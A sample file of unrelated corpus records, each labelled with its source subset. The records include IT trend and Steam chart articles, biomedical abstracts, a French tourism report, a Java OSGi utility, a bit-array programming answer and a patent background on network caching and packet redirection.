From Thank you Sorry It's that time of year when IT executives' thoughts turn to setting resolutions for the new year. We've talked to CIOs, IT analysts and other industry experts about the major trends for 2013 to come up with our own list of suggested IT resolutions. Here's a trend that you can't beat so you might as well join: Employees bringing their own mobile devices to work. Seventy percent of IT organizations are either supporting BYOD now or will be within the next 12 months, according to a recent Gartner survey. "Of the 70% of organizations that want to do BYOD, at least half are not ready," says Dionisio Zumerle, a principal research analyst at Gartner. "You need to change the way you think about security and the way you enable security in the organization. You can't just say to the users 'Please behave' and hope for the best." Zumerle recommends CIOs deploy mobile device management (MDM) or an alternative called Dual-Persona software to allow companies to control employee-owned mobile devices and keep corporate data secure. "Having a mobile security policy that is well designed first on paper is fundamental and can be enforced through MDM or some other software," Zumerle says. "Enforcing passwords, locking devices and remotely wiping devices gives you a level of security that is close to what you would have on a PC...You need to find a way to secure the devices that you don't own." (For more on where BYOD is headed, read "The cloud will make BYOD a non-issue ...eventually.") 2. Strengthen your IT bench. It may seem counter-intuitive to IT executives trying to retain their best developers and project managers, but employees who are trained and certified in emerging technologies usually choose to stay with the organization that paid for their training. "If you train and certify your IT staff, you will keep them," promises Terry Erdle, CompTIA's executive vice president for skills certification. "Training is the No.1 thing that causes your best-in-class IT professionals to stay, and that is because their company invested in them." Erdle recommends that CIOs provide training and certification to about a third of their IT staff each year so that the entire team's skills are current. Popular certification programs for 2013 include cloud and mobile computing, cybersecurity and project management. "Teams that receive training operate better, are more motivated, have fewer quality issues with customers, and their efficiency goes up," Erdle says. "Project teams that are certified tend to hit milestones on time and reach other success metrics more frequently than teams that are not certified." 3. Get your financial house in order. As more IT organizations migrate to a private cloud infrastructure, many are discovering that they don't have the data necessary to accurately charge internal customers for the IT services they provide. "For 2013, I'm resolving to get better at tracking my costs and tracking my revenue," says Corey Kos, enterprise architect for the state of Alaska. Kos recently deployed Cisco UCS and NetApp FlexPod systems in Alaska's main data centers to enable shared IT services across the state. "If you're going to go to any cloud-based infrastructure and do any usage-sort of capacity, then your chargebacks need to be bullet-proof." Kos said he had some difficulty getting the IT and accounting staffs to cooperate on a billing strategy for the e-mail, voice over IP and other centralized IT services that he provides. "We could use some cross-training between the IT and accounting people so they understand what each department does," Kos added. "It needs to be a two-way, cooperative relationship." 4. Become buddies with the CMO. If you're going to accomplish one thing in 2013, you should befriend your company's chief marketing officer. That's the advice of Frank Gens, chief analyst for IDC. "If you're in a consumer-driven industry, you need to get very close to the CMO because that's where the real innovation and strategic investment is going to happen," Gens says. "With trends such as social technologies, it's not about employees; it's about customers.'' Gens says a key challenge for corporations will be integrating data from the most popular social networks into back-end business systems. The CMO is just one of the Line of Business executives who is going to drive an increasing amount of IT spending in the future, Gens predicts. "Almost 60% of new IT investment in 2013 will involve Line of Business executives," Gens says. "About 25% of new IT investments are going to be where the Line of Business executive is the decision maker, and that 25% will go up to 40% by 2016. There's a tide rising where Line of Business executives are gaining more control over IT. This doesn't mean that IT is out, but IT needs to make those relationships with other executives work." 5. Accelerate your move to SaaS. When it comes to enterprise application software - from CRM to collaboration - all the momentum is towards the software-as-a-service model. "The time-to-market with SaaS is very helpful," says Shazia Mian, director of applications systems at Heidrick & Struggles, a Chicago executive recruiting firm that recently deployed popular SaaS offering Salesforce.com and its collaboration tool, Chatter. "There is truly much to be offered out of the box. These applications are pre-built and ready to go, and they meet our business needs. It's much better than starting from scratch and building it out," Mian added. Heidrick & Struggles is running a pilot project with one of its largest global customers that involves integrating Salesforce and Chatter with its strategic account management process. "Where I see Chatter really helping us is connecting people in a quicker fashion and having all of the account information readily accessible. It should improve the way we manage the account globally," Mian says. Alwin Brunner, senior vice president and CIO at Heidrick & Struggles, says he plans to measure the return that his company sees from its Salesforce and Chatter investment. "By looking at the customer holistically, we should see that we are filling requests faster and increasing our share of the customer staffing by our global customers," Brunner says. 6. Mine your unstructured data for strategic advantage. Expect the hoopla over Hadoop to continue in 2013. Spending on Big Data technologies and services will reach nearly $10 billion in 2013 on the way to over $20 billion in 2016, IDC predicts. Companies will be investing in tools that go beyond search to discover hidden patterns in quantitative data and rich media, IDC says. That's the challenge facing Quantcast, a San Francisco firm that measures online audiences for targeted advertising. Quantcast processes close to 30 petabytes of data a day, says CEO Konrad Feldman. To handle this massive amount of data, Quantcast built its own distributed file system - dubbed QFS - which it released to open source in 2012. For 2013, Quantcast is focusing on adding new analytical capabilities while continuing to scale up its data processing and hold down operating costs. "Big data is a rich ecosystem for real-time and batch processing," Feldman says. "In 2013, you will see us do more innovation around reducing the latency of batch processing so we can get more answers quickly.'' Feldman expects Quantcast's Big Data systems to continue growing next year. "Whatever we do now, we will have more in the future: more data centers, more machines, more data,' he says. "We've always been really cost conscious. We've paid attention to how much computing per dollar we achieve...Next year, we'll be looking for ways to achieve better efficiency and better cost/performance" 7. Use IT to slash business costs. The top priority for CIOs in 2013 is likely to be the same as it was in 2012: Using IT to increase business productivity and reduce overhead costs. That was the No.1 IT management concern of CIOs in a recent survey sponsored by the Society for Information Management. CIOs aren't so much focused on IT cost-cutting in 2013, but instead on using IT to increase the profitability of the business. That's the main focus for Bob Keefe, who serves as both CIO and CTO of Mueller Water Products, an Atlanta manufacturer of products for water treatment facilities. "In 2013, I'm looking at business productivity and cost reduction," Keefe says. "We're going to focus more on manufacturing cost reduction. We have a lean Six Sigma operation. Now we're going to see how some of our IT systems work to...get better results." Mueller is already reaping the rewards of similar investments in the past. "We put in a SaaS-based transportation management system that dropped transportation costs for us, and it's lucky it did because our shipments have been more numerous and smaller in quantity lately," Keefe said. In 2013, Mueller also will deploy new ERP software and a CRM service from Salesforce. "We hope to have better sales forecasting," Keefe added. 8. Measure IT system configuration compliance. Cybersecurity expert Alan Paller has one simple suggestion for IT professionals who want to improve their organization's network security in 2013: Measure whether your IT systems are configured correctly. Paller, who is the director of research for the SANS Institute, recommends that companies use a tool such as Microsoft's System Center Configuration Manager (SCCM) to determine whether corporate systems are configured correctly, properly patched and using the most recent versions of operating system software. "If you can get people to measure configuration compliance, they will be shocked by what they find," Paller says. "You've got to measure it in order to fix it....Measurement is the way to get things done."
{ "pile_set_name": "Pile-CC" }
One-pot catalyst free synthesis of novel kojic acid tagged 2-aryl/alkyl substituted-4H-chromenes and evaluation of their antimicrobial and anti-biofilm activities. A number of 3-hydroxy-6-(hydroxymethyl)-2-(2-phenyl-4H-chromen-4-yl)-4H-pyran-4-ones (3) have been synthesized in a one pot catalyst free reaction of 2-hydroxy chalcone (1) with kojic acid (2) in toluene at reflux temperature and evaluated for antimicrobial and anti-biofilm activities. Compounds 3a, 3e, 3f, 3l showed potent antimicrobial activity against Staphylococcus aureus MLS-16 MTCC 2940, Bacillus subtilis MTCC 121 and Escherichia coli MTCC 739, whereas 3b and 3k exhibited excellent activity against Bacillus subtilis MTCC 121 and Escherichia coli MTCC 739, while 3g showed promising activity against Bacillus subtilis MTCC 121 and Escherichia coli MTCC 739. On the other hand, compounds 3a, 3b and 3l showed very good anti-biofilm activity and 3g showed moderate activity against Bacillus subtilis MTCC 121. Whereas, compounds 3a and 3f showed moderate activity against Escherichia coli MTCC 739, while compounds 3a, 3b, 3k and 3l displayed similar activity against Staphylococcus aureus MLS-16 MTCC 2940.
{ "pile_set_name": "PubMed Abstracts" }
Le Musée du Louvre, en avril 2015. Thibault Camus / AP Après plus de deux ans de hausse, l’activité touristique a nettement reculé en France au premier trimestre, « probablement » à cause du mouvement social des « gilets jaunes », selon l’Institut national de la statistique et des études économiques (Insee). Pour les trois premiers mois de l’année, la fréquentation des hébergements collectifs touristiques – exprimée en nuitées – a baissé de 2,5 % sur le territoire, comparé à la même période de 2018, selon des chiffres provisoires publiés jeudi 9 mai. Si ce recul est plus marqué pour les touristes étrangers (– 4,8 %) que pour les touristes français (« résidents », – 1,5 %), il concerne les deux clientèles. Il contraste fortement avec le trimestre précédent, marqué par une hausse de 2 %, et met un terme à « plus de deux ans de hausse continue de la fréquentation touristique », observe l’Insee. Article réservé à nos abonnés Lire aussi L’effet « gilets jaunes » menace la reprise du tourisme Seuls les hôtels 4 et 5 étoiles tirent leur épingle du jeu Cette hausse avait abouti à un record de fréquentation touristique en 2018 dans l’Hexagone, avec plus de 438 millions de nuitées, un chiffre en hausse de 2,4 % comparé à l’année précédente. Le tourisme avait commencé à reprendre des couleurs depuis la chute de fréquentation qui a suivi les attentats du 13-Novembre Nombre de nuitées dans l'hôtellerie Source : Insee Source : Quant à la fréquentation hôtelière, elle recule de 1,3 % de janvier à mars 2019, comparé à la même période un an plus tôt, après une hausse de 1,5 % au trimestre précédent. Seuls les hôtels haut de gamme, 4 et 5 étoiles, tirent leur épingle du jeu en maintenant leur niveau de fréquentation. Là encore, cette baisse met un terme à « une progression continue depuis le quatrième trimestre 2016 », et elle est plus marquée du côté des touristes étrangers (– 3,4 %), alors que celle des Français ne s’effrite que de 0,4 %. Les hôtels haut de gamme attirent toujours autant de touristes, contrairement aux 1 et 2 étoiles Nombre de nuitées au premier trimestre dans l'hôtellerie Source : Insee Source : Paris moins attractive C’est en Ile-de-France que les nuitées hôtelières « diminuent nettement » (– 4,6 %), pour les touristes étrangers comme pour ceux issus du territoire national, « probablement en lien avec le mouvement social des “gilets jaunes” », affirme l’Insee, tandis que dans les villes de province, la baisse n’est que de 0,8 % pour les deux catégories. Le tourisme décroche légèrement en mars, par rapport à l'année précédente Nombre de nuitées en hôtellerie Source : Insee Source : En revanche la fréquentation des touristes étrangers est restée dynamique dans les massifs de ski (+ 4,2 %), alors que celle des Français chutait de 3,1 %. Ces derniers ont souvent opté pour le littoral (+ 4,8 %) afin de profiter des « conditions météorologiques très clémentes » du début d’année, dit l’Insee. Quant à la fréquentation des autres hébergements collectifs touristiques (résidences de tourisme, villages de vacances, maisons familiales, auberges de jeunesse), elle chute de 4,5 % alors qu’elle avait progressé de 3,6 % au trimestre précédent, sur un an. En pleine saison des sports d’hiver, la fréquentation de ces hébergements a chuté dans les massifs de ski : – 7,6 % pour les touristes français et – 8,2 % pour les étrangers. Pour les trois premiers mois de l’année, l’Ile-de-France a représenté plus du tiers (36 %) des nuitées hôtelières et environ 12 % des nuitées en hébergements collectifs du territoire national. Le Monde avec AFP
{ "pile_set_name": "OpenWebText2" }
Leonards Leonards may refer to: Places United States Leonards, California Leonards, Florida Leonards, Wisconsin, an unincorporated community Leonards Point, Wisconsin, an unincorporated community See also Leonard (disambiguation) St Leonards (disambiguation)
{ "pile_set_name": "Wikipedia (en)" }
/* * Copyright 2011 Harald Wellmann. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied. * * See the License for the specific language governing permissions and * limitations under the License. */ package org.wicketstuff.osgi.util; import java.util.Map; import java.util.Map.Entry; import org.apache.wicket.WicketRuntimeException; import org.osgi.framework.BundleContext; import org.osgi.framework.Filter; import org.osgi.framework.FrameworkUtil; import org.osgi.framework.InvalidSyntaxException; import org.osgi.util.tracker.ServiceTracker; /** * A utility class for looking up services from the OSGi registry. The methods of this class wait * for the service for a given timeout (default 10 seconds) and throw a * {@code WicketRuntimeException} when no matching service becomes available during this period. * <p> * NOTE: Prefixing some method calls with our own class name is a workaround for a bug in the Oracle * Java compiler, which does not occur when compiling in Eclipse. * * @author Harald Wellmann * */ public class OsgiServiceLookup { public static final long DEFAULT_TIMEOUT = 10000; public static <T> T getOsgiService(BundleContext bc, String className) { return OsgiServiceLookup.<T> getOsgiService(bc, className, DEFAULT_TIMEOUT, null); } public static <T> T getOsgiService(BundleContext bc, Class<T> type) { return getOsgiService(bc, type, DEFAULT_TIMEOUT); } public static <T> T getOsgiService(BundleContext bc, Class<T> type, Map<String, String> props) { return getOsgiService(bc, type, DEFAULT_TIMEOUT, props); } /** * Returns a service matching the given criteria. * * @param <T> * class implemented or extended by the service * @param bc * bundle context for accessing the OSGi registry * @param type * class implemented or extended by the service * @param timeout * maximum wait period in milliseconds * @param props * properties to be matched by the service * @return matching service (not null) * @throws WicketRuntimeException */ public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout, Map<String, String> props) { return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, props); } public static <T> T getOsgiService(BundleContext bc, Class<T> type, long timeout) { return OsgiServiceLookup.<T> getOsgiService(bc, type.getName(), timeout, null); } @SuppressWarnings("unchecked") public static <T> T getOsgiService(BundleContext bc, String className, long timeout, Map<String, String> props) { ServiceTracker tracker = createServiceTracker(bc, className, props); try { tracker.open(); Object svc = tracker.waitForService(timeout); if (svc == null) { throw new WicketRuntimeException("gave up waiting for service " + className); } return (T)svc; } catch (InterruptedException exc) { throw new WicketRuntimeException(exc); } finally { tracker.close(); } } private static ServiceTracker createServiceTracker(BundleContext bc, String className, Map<String, String> props) { if (props == null || props.isEmpty()) { return new ServiceTracker(bc, className, null); } StringBuilder builder = new StringBuilder("(&(objectClass="); builder.append(className); builder.append(')'); for (Entry<String, String> entry : props.entrySet()) { builder.append('('); builder.append(entry.getKey()); builder.append('='); builder.append(entry.getValue()); builder.append(')'); } builder.append(')'); try { Filter filter; filter = FrameworkUtil.createFilter(builder.toString()); ServiceTracker tracker = new ServiceTracker(bc, filter, null); return tracker; } catch (InvalidSyntaxException exc) { throw new WicketRuntimeException(exc); } } }
{ "pile_set_name": "Github" }
Q: C++: I need some guidance in how to create dynamic sized bitmaps I'm trying to create a simple DBMS and although I've read a lot about it and have already designed the system, I have some issues about the implementation. I need to know what's the best method in C++ to use a series of bits whose length will be dynamic. This series of bits will be saved in order to figure out which pages in the files are free and not free. For a single file the number of pages used will be fixed, so I can probably use a bitset for that. However the number of records per page AND file will not be fixed. So I don't think bitset would be the best way to do this. I thought maybe to just use a sequence of characters, since each character is 1 byte = 8 bits maybe if I use an array of them I would be able to create the bit map that I want. I never had to manipulate bits at such a low level, so I don't really know if there is some other better method to do this, or even if this method would work at all. thanks in advance A: If you are just wanting the basics on the bit twiddling, the following is one way of doing it using an array of characters. Assume you have an array for the bits (the length needs to be (totalitems / 8 )): unsigned char *bits; // this of course needs to be allocated somewhere You can compute the index into the array and the specific bit within that position as follows: // compute array position int pos = item / 8; // 8 bits per byte // compute the bit within the byte. Could use "item & 7" for the same // result, however modern compilers will typically already make // that optimization. int bit = item % 8; And then you can check if a bit is set with the following (assumes zero-based indexing): if ( bits[pos] & ( 1 << bit )) return 1; // it is set else return 0; // it is not set The following will set a specific bit: bits[pos] |= ( 1 << bit ); And the following can be used to clear a specific bit: bits[pos] &= ~( 1 << bit );
{ "pile_set_name": "StackExchange" }
Ramnagar College Ramnagar College (), established in 1972, is a general degree college in Depal, in Ramnagar II, in Purba Medinipur district. It offers undergraduate courses in arts and sciences. It is affiliated to Vidyasagar University. Departments Science Chemistry Physics Mathematics Botany Zoology Physiology Nutrition Aquaculture Management and Technology Industrial Fish and Fisheries (Major) Fishery and Farm Management (B.Voc.) Arts and Commerce Bengali Elective English Sanskrit History Geography Political Science Sociology Music Commerce Physical Education Accreditation The college is recognized by the University Grants Commission (UGC). References External links http://www.ramnagarcollege.com/ Category:Colleges affiliated to Vidyasagar University Category:Educational institutions established in 1972 Category:Universities and colleges in Purba Medinipur district
{ "pile_set_name": "Wikipedia (en)" }
Wake up, get up, get out there Main Menu Impression – Akame ga Kill!, Episode 02 This episode, we get a taste of the more comedic side to Akame ga Kill! This sort of goes back to what I said about the first episode, where the switching between comedy and more serious elements makes light of the darker side of the series. Not only does this lighten the mood, but it also reduces the significance of things like character deaths. Rather than being something worth grieving over, or even being shocked, it kind of just becomes something that happens and we all move on. Tatsumi quickly learns this lesson when he’s given only a brief amount of time to mourn his fallen childhood friends. Though they were swiftly snuffed out in the first episode (even before that, really), their influence on Tatsumi is still remembered, when Tatsumi recalls the times they cooked together. Now at the secret base of Night Raid, Tatsumi has been relegated various odd tasks like fishing and cooking. He also gets to know the members a bit more (I’ll probably talk a bit more about them as the series progresses), and he meets the boss Najenda for the first time. I gotta say that the best part of the episode is when Leone tries to run away from her, but Najenda uses her machine arm to drag her back. For training, Tatsumi is paired with Akame, the girl who tried to kill him twice. Despite her cold demeanor, we learn that she’s actually a pretty simple-minded yet kind-hearted person, who really likes to eat meat. It’s mentioned that she and her sister were enlisted in the Empire’s assassin training program, which was intensive and grueling. This may be the reason why she likes to eat so much, and it makes sense because, as we’ll see later, her sister also likes to eat a lot. I’m actually not too sure how true this is, but it would be very much like the series to create something comedic out of something tragic (and vice-versa). Everyone in Night Raid is hardened by killing, but they’re all aware that their lives are constantly on the line. They can be killed just as easily as they kill others; that’s the law of this world. When they get the request to slay a troublesome soldier from the Empire, Tatsumi steps up to take the job and prove his worth. With a couple of flips and dramatic camera shots, he deftly slays the big man and earns his first official kill under the Night Raid name. Next week, we’ll see some special bonding time with Mine the tsundere sharpshooter! “Everyone here could die at any moment, as retribution for our actions.” ~ Bulat
{ "pile_set_name": "Pile-CC" }
535 U.S. 1022 SONTCHIv.COCKRELL, DIRECTOR, TEXAS DEPARTMENT OF CRIMINAL JUSTICE, INSTITUTIONAL DIVISION. No. 01-8520. Supreme Court of the United States. April 22, 2002. 1 C. A. 5th Cir. Certiorari denied.
{ "pile_set_name": "FreeLaw" }
Every week PCGamesN recount the highest performing titles on Valve’s platform, from the ten Steam top sellers to the Steam games with the most concurrent players. Why? Because knowing what games people are flocking to is useful for discovering new titles and reminding us of the ones we really ought to have tried by now. The first portion of this weekly roundup focuses on Steam sales – that is to say the games and DLC that are selling like proverbial hot cakes. We pull these entries from the Steam store itself, under the global top sellers page. The second part of our Steam charts rundown looks at concurrent players, which gives us some insight into the most played games of the past week. This week sees No Man’s Sky take top spot, not to mention two Sword Art Online games in the top ten best-sellers. The good news doesn’t stop there for No Man’s Sky either, which also grabs a spot in the most played games on Steam. Join us as we list the top ten games for each category along with a brief analysis of the week’s biggest surprises. Steam top sellers Here are the Steam top sellers, week ending July 27th: No Man’s Sky PUBG Monster Hunter: World GTA 5 Monster Hunter: World Deluxe Edition Vampyr Rocket League CSGO Sword Art Online: Hollow Realization Deluxe Edition Sword Art Online: Fatal Bullet PUBG has been pushed to second place this week thanks to the highly anticipated No Man’s Sky NEXT update, which adds what many thought would be in the game from the start: multiplayer. It’s also 50% off, so it’s not too surprising the 2016 space game is having a resurgence. Third and fifth spot are occupied by Monster Hunter: World and its Deluxe Edition – that’s three weeks on the trot that pre-orders for Monster Hunter: world have placed in the Steam charts so Capcom must be pretty happy with their decision to bring the series to PC. GTA 5 is nestled between the two; it’s selling strongly off the back of a major Online update and 34% price reduction. Vampyr takes sixth place thanks to a delectable 25% off sale, which is enough to place it higher than chart stalwarts Rocket League and CS:GO, which grab seventh and eighth spot respectively. The final two places go to Sword Art Online: Hollow Realization Deluxe Edition and Sword Art Online: Fatal Bullet – the former is 50% off, while Fatal Bullet boasts a 40% price reduction. Steam charts by concurrent players Here are the most played games on Steam, week ending July 27th: PUBG Dota 2 CS:GO GTA 5 Warframe Rainbow Six Siege No Man’s Sky Team Fortress 2 Football Manager 2018 Ark: Survival Evolved No major surprises here besides No Man’s Sky, which was played for 1,100,942 hours in one day, which goes some way to showing just how badly people wanted multiplayer in the game. Other than that, PUBG reigns supreme, just like it always does, and all the games we’d expect to see are present. To see how these figures compare to last week’s check out the Steam charts for week 29, 2018. So, there you have it, these are the games people are buying and playing right now – perhaps it’ll help you find your next timesink.
{ "pile_set_name": "OpenWebText2" }
HEADPHONES ARE getting smarter. Outfitted with fancy electronics, such as sensors and digital-signal processors, some are ready to respond to touch gestures or adapt their sound exactly to your liking. Others—3-D printed to quickly create one-off models tailored to your body—are challenging long-held notions about form. This evolution is perhaps to be expected. As more music moves onto the smartphone, headphones are leveraging that touch-screen interface and processing power. Parrot’s Zik 2.0 headphones, for example, can pull off all manner of psychoacoustic wizardry, but the accompanying app is what makes controlling the Zik’s dizzying number of settings possible. While standard headphones have a fixed sound profile that never changes once they leave the factory, models like the Zik 2.0, Alpine and ROAM Ropes allow you to adjust the EQ—the balance of highs, mids and lows—and save that setting directly to the headphones themselves. (Although some existing smartphone apps also let you adjust EQ, they only work with music stored on the device; if you use Spotify or another streaming service, the settings are lost.) As yet, there’s only a small selection of this smarter breed of headphones; the idea is still in its infancy. But once you try one, it’s hard to get excited about less adept models again. Here, a look at four of the most capable that are on the market now—or coming soon. Alpine Headphones With their chrome trim, cushy headband and ear cups as plush as a La-Z-Boy, the Alpines are the equivalent of the thumping sound system you’d find in a pimped-out car. This pair has its own digital amplifiers on board, and the center of the headband is outfitted with a bass transducer (powered by a dedicated amp) that’s designed to vibrate the ear cups and the headband itself to maximize low-frequency punch. Audiophiles may scoff, but there’s no denying that these provide a more visceral, physical experience when listening to hip-hop, electronic dance music and other bass-heavy genres. A free companion app (for iOS only) lets you tweak those lows—and other frequencies—as you see fit. $300, alpineheadphones.com
{ "pile_set_name": "OpenWebText2" }
Billing Specialists Ltd probably has more experience of upgrading NetCracker's Geneva/RBM software than any other consultancy. RBM Upgrades Whilst working for Geneva Technology Ltd., BSL's founder upgraded the first-ever live Geneva operator from Geneva 2.1 to Geneva 3.0 back in August 1999. As a result of that tortuous experience he devised and developed a new tool for upgrading Geneva, which has been used by NetCracker ever since. Our consultants have upgraded several Geneva/RBM operators using both 'out of the box' and custom 'point-to-point' migration solutions. In early 2012 we successfully completed work for a West European operator on their upgrade from RBM 3.0 up to RBM 5.1. We analysed the software in-depth, planned the entire process and developed the solution that went live in spring 2012 (after we had left). The client was very pleased that there was no impact to their business, and the upgrade was so seamless that few users were aware that any changes had taken place. In October 2014 we won the business to upgrade that client from RBM 5.1 to RBM 7.0 which went live in summer 2015, on time and on budget. In fact our preparation and process were so robust that it ran non-stop to the end without incurring a single error. We started on the project in December 2014 and used our own proven mechanism (including script optimisation, automated regression testing and performance analysis). Our client considered this much better value than paying NetCracker to customise its 'point-to-point' process for them. For this project we also cleaned up some historic data to improve performance and identified (at a high level) some new RBM features that they might wish to investigate further. We produced a shrink-wrapped 'click-and-go' upgrade process that they deployed into production themselves after we left the project, although we were available (on-site or remotely) if they required assistance. Our approach is to use the NetCracker-supplied scripts, wherever possible, but fix anything that causes clients a problem (such as configuration tables being overwritten) and we provided pre- and post-upgrade scripts to change the environment and restore it afterwards. Our client required us to upgrade a development server for them, and to 'hold their hands' while one or their team performed an upgrade of another server using the release we built for them and the walk-through document, which included a troubleshooting guide. On all such upgrade projects our clients undertake the user acceptance testing, and they usually take responsibility for their customised code, which usually involves some initial testing to try to see what breaks and also anything that takes considerably longer to run. We the do functional regression tests to compare the results of the rating and billing processes at the source and target RBM versions on the same data for the same accounts. The client will raise defects with NetCracker and managing their resolution, although we provide any evidence needed.
{ "pile_set_name": "Pile-CC" }
Price search results for Sram 1X Front Derailleur Frame Cover SRAM 1X Front Derailleur Frame Cover. Making the move to a SRAM 1x drivetrain, but have a direct mount frame Don't leave that unsightly mount there on your frame. Just cover it up with this handy little frame cover, which not only covers the mount, but protest the frame.
{ "pile_set_name": "Pile-CC" }
Role of the amino acid 45 residue in reduced folate carrier function and ion-dependent transport as characterized by site-directed mutagenesis. In previous reports, an E45K mutation in reduced folate carrier (RFC1) resulted in marked substrate-specific changes in folate binding and the induction of an obligatory inorganic anion requirement for carrier function. In this study, site-directed mutagenesis was employed to further characterize the role of glutamate-45 in carrier function by replacement with glutamine, arginine, aspartate, leucine, or tryptophan followed by tranfection of the mutated cDNAs into the MTX(r)A line, which lacks a functional endogenous carrier. Alterations in transport function with amino acid substitutions at this residue were not charge related. Hence, E45Q, E45R, and E45K all 1) increased carrier affinity for 5-formyltetrahydrofolate approximately 4-fold, 2) increased affinity for folic acid approximately 6- to 10-fold, 3) did not change affinity for 5-methyltetrahydrofolate, and 4) except for E45R decreased affinity for methotrexate (2- to 3-fold). In contrast, mutations E45D, E45L, and E45W generally reduced affinity for all these folates except for folic acid. Finally, chloride-dependent influx was only noted in the E45R mutant. These data further substantiate the important role that glutamate-45 plays in the selectivity of binding of folates to RFC1 and establish that it is the addition of a positive charge at this site and not the loss of a negative charge that results in the induced anion dependence. These and other studies indicate that mutations in the first transmembrane domain can have a markedly selective impact on the affinity of RFC1 for folate compounds and in particularly a highly salutary effect on binding of the oxidized folate, folic acid.
{ "pile_set_name": "PubMed Abstracts" }
The present invention relates to transmission of data in a network environment. More specifically, the present invention relates to methods and apparatus redirecting network traffic. Still more specifically, techniques are described herein for replicating packet flows for a variety of purposes including, for example, troubleshooting, load balancing, and reliability. Generally speaking, when a client platform communicates with some remote server, whether via the Internet or an intranet, it crafts a data packet which defines a TCP connection between the two hosts, i.e., the client platform and the destination server. More specifically, the data packet has header fields which include the destination IP address, the destination port, the source IP address, the source port, and the protocol type. The destination IP address might be the address of a well known World Wide Web (WWW) search engine such as, for example, Yahoo, in which case, the protocol would be TCP and the destination port would be port 80, a well known port for http and the WWW. The source IP address would, of course, be the IP address for the client platform and the source port would be one of the TCP ports selected by the client. These five pieces of information define the TCP connection. Given the increase of traffic on the World Wide Web and the growing bandwidth demands of ever more sophisticated multimedia content, there has been constant pressure to find more efficient ways to service data requests than opening direct TCP connections between a requesting client and the primary repository for the desired data. Interestingly, one technique for increasing the efficiency with which data requests are serviced came about as the result of the development of network firewalls in response to security concerns. In the early development of such security measures, proxy servers were employed as firewalls to protect networks and their client machines from corruption by undesirable content and unauthorized access from the outside world. Proxy servers were originally based on Unix machines because that was the prevalent technology at the time. This model was generalized with the advent of SOCKS which was essentially a daemon on a Unix machine. Software on a client platform on the network protected by the firewall was specially configured to communicate with the resident demon which then made the connection to a destination platform at the client's request. The demon then passed information back and forth between the client and destination platforms acting as an intermediary or “proxy”. Not only did this model provide the desired protection for the client's network, it gave the entire network the IP address of the proxy server, therefore simplifying the problem of addressing of data packets to an increasing number of users. Moreover, because of the storage capability of the proxy server, information retrieved from remote servers could be stored rather than simply passed through to the requesting platform. This storage capability was quickly recognized as a means by which access to the World Wide Web could be accelerated. That is, by storing frequently requested data, subsequent requests for the same data could be serviced without having to retrieve the requested data from its original remote source. Currently, most Internet service providers (ISPs) accelerate access to their web sites using proxy servers. Unfortunately, interaction with such proxy servers is not transparent, requiring each end user to select the appropriate proxy configuration in his or her browser to allow the browser to communicate with the proxy server. For the large ISPs with millions of customers there is significant overhead associated with handling tech support calls from customers who have no idea what a proxy configuration is. Additional overhead is associated with the fact that different proxy configurations must be provided for different customer operating systems. The considerable economic expense represented by this overhead offsets the benefits derived from providing accelerated access to the World Wide Web. Another problem arises as the number of WWW users increases. That is, as the number of customers for each ISP increases, the number of proxy servers required to service the growing customer base also increases. This, in turn, presents the problem of allocating packet traffic among multiple proxy servers. Network caching represents an improvement over the proxy server model which is transparent to end users, high performance, and fault tolerant. By altering the operating system code of an existing router, the router is enabled to recognize and redirect data traffic having particular characteristics such as, for example, a particular protocol intended for a specified port (e.g., TCP with port 80), to one or more network caches connected to the router via an interface having sufficient bandwidth. If there are multiple caches connected to the cache-enabled router, the router selects from among the available caches for a particular request based on a load balancing mechanism. The network cache to which the request is re-routed “spoofs” the requested destination platform and accepts the request on its behalf via a standard TCP connection established by the cache-enabled router. If the requested information is already stored in the cache it is transmitted to the requesting platform with a header indicating its source as the destination platform. If the requested information is not in the cache, the cache opens a direct TCP connection with the destination platform, downloads the information, stores it for future use, and transmits it to the requesting platform. All of this is transparent to the user at the requesting platform which operates exactly as if it were communicating with the destination platform. Thus, the need for configuring the requesting platform to suit a particular proxy configuration is eliminated along with the associated overhead. An example of such a network caching technique is embodied in the Web Content Caching Protocol (WCCP) provided by Cisco Systems, Inc., a specific embodiment of which is described in commonly assigned, U.S. patent application Ser. No. 08/946,867 (now U.S. Pat. No. 6,240,461) for METHOD AND APPARATUS FOR FACILITATING NETWORK DATA TRANSMISSIONS filed Oct. 8, 1997, the entirety of which is incorporated herein by reference for all purposes. Another specific embodiment of a packet redirection protocol which may be used to implement such a network caching technique is described in copending, commonly assigned, U.S. Provisional Patent Application No. 60/168,862 for METHOD AND APPARATUS FOR REDIRECTING NETWORK TRAFFIC filed Dec. 2, 1999, the entirety of which is incorporated herein by reference for all purposes. According to a specific embodiment described in that application, the network caches have the capability of determining that particular redirected packets should be transmitted back to the redirecting router and reinserted into the original traffic flow. This may be done in a manner transparent to the source or destination of the packets. An example of a case in which packets would need to be reinserted in the original flow might be where the cache recognizes the source and destination pairs identified by the packets as corresponding to a connection requiring IP-based authentication. Another example would be where the cache is overloaded and is currently unable to handle all of the redirected traffic. When information in a packet flow between two devices, e.g., a router and a network cache, is corrupted, it is useful for troubleshooting purposes to examine the sequence of packets as they are transmitted over the link. One technique for determining the cause of such corruption involves the insertion of a hub between the two devices and the connection of a network sniffer to the hub. The hub duplicates all the packets in the flow and the sniffer allows a technician to view the packet sequence. Unfortunately, this troubleshooting technique requires physically connecting the hub in close proximity to one of the two devices. As will be understood, this may not be practicable at geographically remote or isolated customer sites. Therefore, a technique is needed by which the troubleshooting of packet flows in particular routers may be made more practicable. Another problem associated with network transmissions is reliability. That is, because of a variety of network conditions (e.g., hardware and software failures, network congestion, etc.), transmitted packets occasionally fail to reach their intended destinations. When a packet flow encounters such a condition, a new packet flow must typically be established to avoid the condition and make the specified connection. Not only is there a noticeable latency involved with reestablishing the packet flow, but there are certain client/server connections for which such an interruption is completely unacceptable. Therefore, there is also a need for improving the reliability with which data traffic is transmitted in network environments.
{ "pile_set_name": "USPTO Backgrounds" }
